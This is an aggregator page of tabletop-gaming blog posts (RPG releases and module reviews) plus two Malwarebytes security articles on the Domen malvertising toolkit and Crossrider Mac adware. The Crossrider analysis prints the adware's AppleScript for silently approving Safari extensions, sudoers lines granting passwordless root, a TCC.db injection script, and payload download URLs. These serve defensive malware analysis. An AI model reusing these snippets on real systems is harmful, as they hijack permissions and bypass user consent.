Feed aggregator

MTDAA Twilight Has Arrived

The Splintered Realm - Sun, 03/01/2020 - 13:43
What if the B/X engine was used to create a mashup of a certain 1980s para-military post apoc game, another game set in a world of rampaging mutants, and the coolest elite military unit comic of all time?
It would probably look like this.
Michael T. Desing’s Army Ants: Twilight is two things: first, it’s an ongoing narrative about a group of ants at the end of the Ant/Wasp War, © Michael T. Desing. It is also a roleplaying game for two or more players, released under the Open Game License.
As a reader, you will hopefully decide to follow the exploits of a team of army ants on their greatest, and possibly final, adventure.
As a player, you will take on the role of an army ant or an allied bug, traversing the wilds. You will join with a team of other bugs to overcome the challenges that the referee places before you. You will use these rules, an assortment of dice, and your imagination to craft a shared tale of your adventures.
This core ruleset, which is also the first issue of the ongoing series, is released as a PWYW book in glorious full color, the way the 1980s would have wanted.
As part of the "Army Ants are on the MARCH" promotion, all other Michael T. Desing's Army Ants titles are also PWYW through March 31! Now is the time to get caught up on all things army ant.

28mm Koblod Cavalry On Kickstarter - Ends Sunday - Fully Funded.

Two Hour Wargames - Sun, 03/01/2020 - 02:54
Kobold CavalryCheck it out. Sculpts by Bob Olley - very good stuff and into the Stretch Goals already!

Categories: Tabletop Gaming Blogs

One Day More

The Splintered Realm - Sat, 02/29/2020 - 21:23
Michael T. Desing's Army Ants: Twilight launches tomorrow, and I have a few little tricks up my sleeve yet to come. I finished edits today, and I'm very happy with this game. It is a tight little game - this is the game I wanted to write 25 years ago, but I just didn't have the chops to do it yet.

I look forward to sending it out to the world tomorrow, and I'm excited to hear what you think.


Strangers In A Sword & Sorcery Land - A Leap Day Sale - Cha'alt & AS&SH combined with Old School Campaign Goodness

Swords & Stitchery - Sat, 02/29/2020 - 21:09
The world of Cha'alt started as a fairly typical medieval land with elves, dwarves, snake-men, clerics, and magic-users; steeped in superstition along with antediluvian traditions, before the Old Gods went mad.  Three-thousand years passed. The surface dwellers split from the malevolent creatures who slithered below. Those who remained on the surface lost the understanding of magic, but theirNeedleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Tracts in Amber - Some CampaignThoughts on Clark Ashton Smith's Zothique, Mystara, & Tom Modvey's X2 Castle Amber

Swords & Stitchery - Sat, 02/29/2020 - 17:31
"Aeons of aeons ago, in an epoch whose marvelous worlds have crumbled, and whose mighty suns are less than shadow, I dwelt in a star whose course, decadent from the high, irremeable heavens of the past, was even then verging upon the abyss in which, said astronomers, its immemorial cycle should find a dark and disastrous close. Ah, strange was that gulf-forgotten star - how stranger than any Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

(5e) Cha’alt

Ten Foot Pole - Sat, 02/29/2020 - 12:11
By: Venger As’nas Satanis Kort'thalis Publishing 5e? Sure, whatever Venger ... Level: Meaningless! Fuck your rules!

Cha’alt is the beast of a book (218 pages) I’ve been working on for the past year.  It’s a ruined world focusing on a couple of introductory dungeons before getting to the main event – the megadungeon known as The Black Pyramid.   The Black Pyramid is like nothing you’ve ever seen before. Unique design, purpose, feel, magic items, NPCs, monsters, factions, motives, agendas, strangeness, the works! There’s a decent amount of setting detail besides dungeoncrawling – space opera bar, domed city, mutants, weird ass elves, desert pirates, a city ruled by a gargantuan purple demon-worm, and much more!

This 218p book is part setting and part 111 room dungeon. It’s Venger doing what Venger does, in terms of creativity, and Venger Under Control when it comes to his worst qualities (writing too much, for example.) As written, the setting is better than the main adventure, The Black Pyramid dungeon. You could tweak it and make it better. Then it would be one of the best Rifts hexcrawls ever.

So, two books in one. The first chunk is a description of the world the Black Pyramid dungeon sits in, as well as a couple of smaller dungeon. Those two mini-dungeons are perhaps representative of some of Vengers worse work. Linear-ish, and maybe starting off by nuking your L1 characters with a fireball from a 7HD invisible wizard in the first room. But, let’s ignore those two efforts.

The game world is a mashup of every post-apoc trope ever. Independent city states. Giant mecha city. Domed city. Roving tribes of primitive wastelanders. Giant sandworms. Cthulhu shit and cultists. Galactic Star Empires. Heavy Metal. You name it and Venger threw it in. Dune-like Spice fracking, methcrystals, and even sex panther cologne from the Anchorman movies. El Senor Venger Assman don’t know know restraint, and that’s a good thing for something like that. So, take about half of those RIfts supplements books, distill them down to about a column each, and call that your game world. Groovy. Best Rifts/Gamma World setting ever. I remember some blog that had something like a UFP Starship crew messing around on Carcosa. It reminds me a lot of that, except you’re not the starship crew. Probably. I call this a Yul Brenner. And it’s a decent Yul Brenner. Enough detail in those columns to inspire the DM, which is what fluff should do. Basically, while exploring the main event (The Black Pyramid) the party might need something/want to do something outside of the dungeon and that’s where this support material comes in.  Healing, complications for the DM to throw in, get a replacement arm that’s robotic from the robo-surgeon in the domed cities, or sell your chthonic artifact. That’s the real purpose of this section, which lasts about half the book. Like I said, I’m kinder these days about background fluff. 

And then there’s Maud. I mean, The Black Pyramid. This is the focus of the book and the reason you bought it. This is an absurdist funhouse dungeon with no pretext to it. Blue Medusa may be the closest analogy. A bunch of vignettes, a set piece in each room, described and the players encountering it. Blue Medusa, though, had some internal logic. There was some pretext. Some of the rooms worked together. It kind of made sense.

Not this. “Funhouse Dungeon” is thrown around a lot. I suggest that we are all individuals, err, I mean hyperbolics, at least in this area. The Black Pyramid has no logic at all behind it. Imagine an army of 10,000 men in a 10×10 room. And 18 Cthulhus in the next room with 12 Abolethethsin a desert room in the door on the other side. I’m not a simulationist. Food, water, bathrooms, neighbors … I don’t think I’m really hung up on that shit. But here Venger pushes past any semblance of suspension of disbelief. Suspending your suspension of disbelief, as it were. One room has a movie theater, with patrons. How did they get there? What do the people next door think? Travel rights? Nothing matters. It just is. Run it. The Peewee’s Playhouse room? Just run it. Any of a hundred other joke rooms? Just run it.

This then is your main qualification for wanting this, at least to run. Do you want to run a game like that? A game in which nothing matters? I realize that statement could be taken as me poking fun, or being negative, but I’m not being that when I say it. Do you want to run a funhouse? A REAL funhouse? Then this is for you.

It’s got an index. The rooms are fairly well organized, maybe tending to the lengthier side of things in places, but not terrible in that regard.  Something is going on in each, in some fashion, so it’s not the expanded minimalism that others engage in. It’s ok. I’m too traumatized, still to this day, by WG7. I can’t enjoy a real funhouse dungeon. 

But …

Listen to the Voice saying Follow Me …

Venger ‘The AssMan’ Satan has missed a real opportunity with Chaalt. Or, maybe, that opportunity still exists. This COULD be the greatest Rifts/Gamma World adventure to ever exist. EVAR. Both of those have a serious fanbase behind them and neither has anything like “Anything Good” to support them. Of course you can’t call it for Rifts cause Kevin will sue the fusk out of you.

But …

If you take The Black Pyramid, each of its little vignettes, and instead give it room to breathe … you turn it in to a HexCrawl! The most bestest post-apoc hexcrawl evar! Then it has room. The pretext is handled almost automatically. The fucking dungeon is really a pointcrawl anyway, this one in particular. Venger’s got some pretext “connecting tubes’ thing to connect his little vignettes in extradimensional space, but why not instead just go all in and make it a hexcrawl, turning each room in to a hex? You spend, what, two months rearranging the rooms a bit to make a bit more sense and fitting them in to the most minimal pretext and logic possible. This, then, would be a chance for Venger to go mainstream. Capture all of that Rifts/Dark Sun/Gamma World/Eberron demand. 

This funhouse would work that way. The pretext is easy. It’s a hexcrawl, that’s how people got there. A little bit more work, a couple of months, rewriting and rearranging. Then it’s yours Venger! All of the success ever in the world! But you gotta put in a little extra work to turn it in a hexcrawl is a little pretext. I suspect, though, Venger is morally opposed to that though.

This is $20 at DriveThru. The preview is the first 32 pages. As such you get to see the Gamma World like game world. It would have been better to also include a few pages of actual encounters in the pyramid, maybe one of its maps also, so people knew just how funhouse and pointcrawl they were buying.

https://www.drivethrurpg.com/product/284600/Chaalt?1892600

Categories: Tabletop Gaming Blogs

The Egg of the Coot & The Demon Worm - Cha'alt/Godbound Campaign Commentary Session Report Part Ten

Swords & Stitchery - Sat, 02/29/2020 - 05:41
The Witch Coven of Garlghast & the Egregore set by Privateer Press (34035), make excellent substitutes for the witches of Egg of Coot.  Cha'alt/Godbound  campaign had a high rate of ultra violence! In tonight's game the party encountered a Cha'alt demon worm along with purple demon  cleric summoner  & its  the sky ship guardians. The demon worm turned on the handlers as its cleric was Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

The Ants Are Ready to MARCH

The Splintered Realm - Fri, 02/28/2020 - 18:29
From now through the end of March, all MTDAA releases are up as pay-what-you-want downloads. If you have some holes in your MTDAA library, now is the time to fill them. This month will also see the release the the MTDAA: Twilight RPG, which uses the same system (and fundamental layout) as Tales of the Splintered Realm. It's a B/X retro style version of MTDAA with shades of Twilight 2000 and Gamma World. I expect it to be out early next week; I'm in final edits right now, and want to make sure that all the tweaks are sufficiently tweaked before I tweet. Or something like that.


Domen toolkit gets back to work with new malvertising campaign

Malwarebytes - Fri, 02/28/2020 - 17:54

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we had ever seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

A couple months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

The payload is this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit

search-one[.]info
panel-admin[.]best
mix-world[.]best

Smoke Loader

1a91b2a3a252554842de875c89f6eee105bc419d7e32d3a5c9f0f9078780ab30
vuterfaste[.]ru

IntelRapid

46.166.129[.]235/forum/files/client.exe
33d5f80242b4006ce14bba56692e1936157e0216b93faac823c42cc3f9ab4ec1

Vidar

46.166.129[.]235/forum/files/mass.exe
76ce130d2447f71bea8ed902959fd7e0aeac86b55f9e44a327c1f1c1bd73ba3f
molothunsen[.]com

Buran/Zeppelin

semantrus.pw/upload/open.exe
0163bb148d4eb632d00d6d3080e07bba46f2f3549e8f95a8ca8951c10280694f

Vidar

cq08462.tmweb[.]ru/88.exe
628a9c97a55155f60d3b5ae29bc64f1dca5a6baf2b4f6a1a1de5e836cd4fb73f
desperate[.]website

The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Divine Inspiration - Ray Harryhausen's Jason & The Argonauts 1963 & Advanced Dungeons & Dragons Campaign Commentary

Swords & Stitchery - Fri, 02/28/2020 - 17:27
"The legendary Greek hero leads a team of intrepid adventurers in a perilous quest for the legendary Golden Fleece. " Sometimes you've got to go back to the well for inspiration & in this case its the Ray Harryhausen 1963 classic Jason & the Argonauts. Here's the low down on this film from its wiki entry; "Jason and the Argonauts (working title: Jason and the Golden Fleece) is a 1963 Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Friday Larchive – Postcards From The Past

Looking For Group - Fri, 02/28/2020 - 17:13

Fridays, we open the Larchives, Lar’s extensive archive of art work oddities, and share a few pieces. Sometimes there will be a theme, or a reason behind the choices. Other times there will be none. With another Larchive Friday falling […]

The post Friday Larchive – Postcards From The Past appeared first on Looking For Group.

Categories: Web Comics

GFL – Page 0012.5

Looking For Group - Thu, 02/27/2020 - 20:29

Grouping For Looks is a page-by-page retelling of the Looking For Group saga through the lens of a mirror universe where Cale is a goateed tyrant and Richard is a holy soul trying to set him on a good path. […]

The post GFL – Page 0012.5 appeared first on Looking For Group.

Categories: Web Comics

Mac adware is more sophisticated and dangerous than traditional Mac malware

Malwarebytes - Thu, 02/27/2020 - 18:34

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

http://cdn.mycouponsmartmac.com/download/Mac/InstallerResources/pwr.zip

This file is expanded into an app named mm-install-macos.app. The sole purpose of this app is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed webtools.app is downloaded and executed using the phished password to run as root:

http://cdn.myshopcouponmac.com/download/Mac/InstallerResources/wt.zip

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

http://dl.searchmine.net/download/Mac/InstallerResources/unified/SearchMine/imsearch.tar.gz

This is extracted, and an install.sh script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000} tell application "System Events" set visible of process "Safari" to false tell application process "Safari" set frontmost to true log "Clicking button 1 of sheet 1" tell window 1 to tell sheet 1 to click button 1 delay 1 end tell end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

http://service.macinstallerinfo.com/Mac/getInstallScript/scripts/bin/iwt.bin

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750 line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the higest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added to allow a couple of the installed processes to have root permissions when running on the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file, interfering with the ability to get root permissions. This can affect software installation abd the ability to troubleshoot, and is difficult to fix. (In order to fix the sudoers file, you must have root access, which you can’t get because the sudoers file is broken—it’s a catch-22.)

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).

someuser ALL=(ALL) NOPASSWD:ALL

These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac processes in the first example (which would not require special access), it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.

TCC.db

In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then /usr/bin/sqlite3 <<EOF .open '${TCCDB}' insert or replace into access values('kTCCServiceAccessibility','com.apple.Terminal',0,1,1,NULL,NULL); ... insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/installOffers.sh',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.mm-install-macos.www',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.mm-installer-macos.www',0,1,1,NULL,NULL); .quit EOF fi

This only works on older systems, as the TCC.db file is read-only by anything other than the system on recent versions of macOS. However, on an older system, this can give powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data.

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly-generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.

IOCs

The following indicators of compromise are associated with this adware.

Domains http://www.weknow.ac http://*.searchmine.net http://client.mm-bq.host http://service.macinstallerinfo.com http://*.macmymacupdater.com http://*.mycouponsmartmac.com http://*.myshopcouponmac.com http://*.mycouponizemac.com http://*.shopperifymac.com http://*.shoppinizermac.com http://*.couponizermac.com http://*.surfbuyermac.com http://*.surfmatemac.com http://*.myshopbotmac.com http://*.myshopmatemac.com http://*.bestsmartshoppersmac.com Files searchmine.sh441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9mm-install-macosee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51webtools888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31imsearch.tar.gze07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08install.sh591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031iwt.bin168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361gui_scripting.shdf402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9finstallSafariExtension212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14installSafariHpNt18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9aupdate_legacy_chrome.py   b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064updatePreferences.py6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

[REVIEW] The Treasures of the Old Kingdom

Beyond Fomalhaut - Thu, 02/27/2020 - 17:00
Treasures of the Old Kingdom
[REVIEW] The Treasures of the Old Kingdom (2020)by Jonathan HicksPublished by Farsight GamesLow levels
Disappointment comes in many forms. The cynical cash grab, the sloppy mess, the paint-by-the numbers borefest, the formulaic knockoff, the fantasy module with no sense of the fantastic, the outrageous disaster. None are more tragic than the misguided labour of love. This is the adventure you would like to succeed, but which end up failing. Treasures of the Old Kingdom is a tragic failure, because it is built on multiple fundamental adventure design mistakes. It is not bad because its author failed at doing something – rather, it did because he kept doing the wrong things. Not out of malice, but because we – the hobby, collectively – have failed to make a proper distinction between good and bad adventure design. This module keeps making mistakes in an entirely typical manner – typical enough among many disappointing modules to make me choose it as an exhibit of “DON’T DO THIS!” So here we are.
To begin with the good, this adventure is entirely self-illustrated in an amateurish but endearing style. Nobody will call it good art, but it has charm – there is a soul to it. It is also a module that has a few pieces of good imagery poking out from the bad baseline. A tiny kingdom whose king is little better than a local bandit; a muddy, half-built settlement that’s between an encampment and a new village; its tavern, a great tent with a tree sticking out through a big hole in the canvas; a great ruined statue standing over a river, Colossus of Rhodes-style; a military camp preparing for a battle with invading orcs. These are well realised, and there is certainly a visual imagination at play.Best TavernBut these are set pieces. Not interactive bits, not even things which get a part in play (none of the above do). They are scenery in a predetermined story. It is clearly intended as an epic that starts as skirmishes against monster lairs, and builds up into an epic secret quest into dangerous territory involving a mysterious benefactor and an evil magic item… and you get to sail beneath a great statue from a forgotten age (where could that come from?). What actually happens over the course of the adventure follows the stages of a linear narrative, with a fairly inconsequential side quest. You know it will be bad when you see it is set up as a story – “Part One”, “Part Two”, and so on. It is railroading, with a lack of player agency – things happen because they happen, and because the adventure would be over if the players didn’t go along with the GM. If they don’t take the mission… if they follow a different course of action or a different route… if they do something differently than intended… the adventure as written is over.
Meaningful player agency is missing from the big picture, but also from decisions on the level of individual encounters. There is nothing useful to do outside the adventure plot, and there is not much opportunity to do something more than go along. Initially, the players can pick between clearing out multiple monster lairs, a choice which does not matter (because the lairs are simple 1-4 room affairs with little content going for them). Later, they get a Plot Chaperone, who feeds them plot points in exchange for doing as she tells them. Except for the last segment, they don’t have to make hard decisions, or figure out something on their own, or come up with a clever stratagem that saves the day. They are just along for the ride. Ironically, the railroading even removes the usefulness of the content that might actually serve as a basis for something better. For example, there is some not-entirely-bad background info on the mini-kingdom, along with a nice regional map, but it gets no play because it does not matter – the plot train passes them by.The Kingdom of Cardigul (not actually featured in a meaningful sense in this module)As it often goes with tragically bad adventures, the proportion of functional and utterly useless content is seriously skewed. A lot of attention is dedicated to background detail (that does not enter play), read-aloud texts and NPC monologue (that only pulls down the experience), and a lot of framing for utterly inconsequential scenes (that are basically filler). There is the obligatory “next morning” section, one of the sure-fire signs the author wanted to write a story instead of playing a multi-player game. Lengthy exposition on trivial material, usually as a way to link important scenes to form a coherent narrative structure. That is the mistake: trying to enforce a vision instead of letting it happen spontaneously. Railroading is not just a removal of player agency. I have observed in many similar modules that it also tends to result in a lot more effort to accomplish simple things than normal. In a better constructed module, one good paragraphs could convey the GM the ideas which several bad ones do not. This is a 28 page adventure which could have easily been two pages (as it stands), or which could have used so many words to give us a much more rounded, complex adventure, and a mini-gazetteer to boot. However, this adventure does not even trust the GM to do obvious, simple things. Paradoxically, it becomes over-detailed in filler sections which do not matter, and remains underdeveloped in sections which might (adventure content).
The adventure’s dungeons are not dungeons. Not in the sense envisioned by D&D’s makers. They are quite minuscule even by lair standards. The lair of the Mutant Ogre is a 4-room cave system, the two optional side-encounters are single-area affairs, and the burial vault – the final objective – is a corridor with four rooms to the sides, and a fifth room at the end. But even this vault has barely anything in it except overlong boxed text focused on mundane detail, and four basic encounters which are slightly fancy combats.
Ce n'est pas un dungeon.The story must triumph over all impediments, including pesky players. We encounter the typical design tactic of second-guessing. In an early lair encounter, the GM is advised to fudge an encounter:“If you feel that the players outmatch the Mutant Ogre too much, or they are defeating it too easily, then have another walk in from cave 4 – it seems the Mutant Ogre wasn’t working alone, after all! However, don’t make it too hard for the players as this is their first encounter and there’s a lot for them to do before this adventure is even remotely over.”I have seen many similar adventures as a player (and have been guilty of GMing them in the past), where, for the sake of “correct pacing”, the GM sacrificed the game’s ability to offer surprises, setbacks, and grand victories. You can never be too clever, or just absolutely lucky, nor can you fail conclusively. If you rise above the “plot zone”, you are hammered down; if you fail, your defeat is snatched from your grasp to keep you trudging along the Storyline – one that is no longer your own.
Later in the adventure, the characters must venture into a war zone to retrieve the MacGuffin, hidden in a small dungeon. A battle between orcs and men rages around them as they race against time to find a hidden switch, but there are no stakes, because the GM is instructed to control the scene:“Make sure that the PCs who fight aren’t hurt too badly and run the battle as cinematically as possible; the enemy should be easy to fight, foes the PCs can take down with pretty much one hit, and any attacks on the PCs should be weak and lacking damage – minus 1 from all rolls with a minimum of 1. (…) If the PCs do engage in the fight, make it exciting and incredibly tense as the orcs try their hardest to get over the wall and into the compound. (…) The battle is fierce, and just as it seems the walls are about to be breached have Carthean or one of the PCs find the symbol (…).”Carthean Outlines
